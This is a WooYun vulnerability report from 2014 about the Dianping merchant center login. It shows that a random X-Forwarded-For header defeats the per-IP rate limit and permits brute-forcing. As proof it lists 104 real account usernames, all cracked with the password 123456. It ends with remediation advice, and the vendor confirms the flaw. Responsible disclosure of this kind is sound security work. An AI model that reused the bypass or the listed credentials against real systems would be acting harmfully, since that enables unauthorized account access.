当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088906

漏洞标题:大众点评某后台绕过后暴力破解(验证破解账号104个)

相关厂商:大众点评

漏洞作者: lijiejie

提交时间:2014-12-27 14:58

修复时间:2015-02-10 15:00

公开时间:2015-02-10 15:00

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-27: 细节已通知厂商并且等待厂商处理中
2014-12-27: 厂商已经确认,细节仅向厂商公开
2015-01-06: 细节向核心白帽子及相关领域专家公开
2015-01-16: 细节向普通白帽子公开
2015-01-26: 细节向实习白帽子公开
2015-02-10: 细节向公众公开

简要描述:

大众点评某后台绕过后暴力破解(验证破解账号104个)

详细说明:

http://e.dianping.com/ 商户中心,可暴力破解。
有简单的限制,单个IP登录不能过频,错误太多。
随机X-Forwarded-For头可绕过。

漏洞证明:

挂一个字典,密码固定123456,破解104个账号:

dianping.com_cracked.png


userName=admin&password=123456
userName=anqi&password=123456
userName=aoxiang&password=123456
userName=remember&password=123456
userName=show&password=123456
userName=he&password=123456
userName=atao&password=123456
userName=binli&password=123456
userName=boqian&password=123456
userName=boyi&password=123456
userName=caiwu&password=123456
userName=chaitian&password=123456
userName=changgang&password=123456
userName=chaosheng&password=123456
userName=chaozhou&password=123456
userName=daqiao&password=123456
userName=dazhong&password=123456
userName=dandan&password=123456
userName=diandian&password=123456
userName=dinghua&password=123456
userName=dongfang&password=123456
userName=dongxu&password=123456
userName=dongzheng&password=123456
userName=dunhua&password=123456
userName=fangcun&password=123456
userName=gangbei&password=123456
userName=gaoqiao&password=123456
userName=gejun&password=123456
userName=haicang&password=123456
userName=haimen&password=123456
userName=hanshe&password=123456
userName=hehai&password=123456
userName=hongda&password=123456
userName=huadian&password=123456
userName=huangcun&password=123456
userName=hunchun&password=123456
userName=jinbi&password=123456
userName=jingdong&password=123456
userName=jiuguang&password=123456
userName=langjian&password=123456
userName=letai&password=123456
userName=likai&password=123456
userName=liuhe&password=123456
userName=liuwen&password=123456
userName=liuxiao&password=123456
userName=longquan&password=123456
userName=luoma&password=123456
userName=linfei&password=123456
userName=lujuan&password=123456
userName=mapai&password=123456
userName=manmiao&password=123456
userName=meihe&password=123456
userName=minyi&password=123456
userName=moer&password=123456
userName=nanfeng&password=123456
userName=nangang&password=123456
userName=nangang&password=123456
userName=niujie&password=123456
userName=qiaoxing&password=123456
userName=ruiyi&password=123456
userName=sanya&password=123456
userName=shangru&password=123456
userName=shijian&password=123456
userName=shousi&password=123456
userName=shulan&password=123456
userName=shuwei&password=123456
userName=sunli&password=123456
userName=tianshui&password=123456
userName=tuanhe&password=123456
userName=waitan&password=123456
userName=wantong&password=123456
userName=wangsong&password=123456
userName=wangtao&password=123456
userName=weixiao&password=123456
userName=xibei&password=123456
userName=xisi&password=123456
userName=xianggang&password=123456
userName=xianglu&password=123456
userName=xiaoyuan&password=123456
userName=xieting&password=123456
userName=xinshi&password=123456
userName=xuanya&password=123456
userName=xuening&password=123456
userName=xueyuan&password=123456
userName=yanan&password=123456
userName=yanan&password=123456
userName=yanbu&password=123456
userName=yanquan&password=123456
userName=yangqiao&password=123456
userName=yinfeng&password=123456
userName=yintai&password=123456
userName=youtang&password=123456
userName=yuzong&password=123456
userName=zhangting&password=123456
userName=zhangyuan&password=123456
userName=zhenshan&password=123456
userName=zhikang&password=123456
userName=zhonggang&password=123456
userName=zhouxiang&password=123456
userName=zhusu&password=123456
userName=xiaona&password=123456
userName=xuxin&password=123456
userName=yingyun&password=123456
userName=zhangan&password=123456

修复方案:

一点建议:
1) 首先解决X-Forwarded-For头绕过问题,取真实IP。
2) 尽量整顿下弱口令,更严格地限制密码强度。

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-12-27 16:20

厂商回复:

感谢对大众点评安全的关注

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-27 22:26 | kydhzy ( 普通白帽子 | Rank:362 漏洞数:62 | 软件测试)

    强大的密码本在哪?

  2. 2014-12-28 23:42 | debbbbie ( 路人 | Rank:10 漏洞数:2 | 深藏功与名 - A Rubyist)

    后台。不是前台啊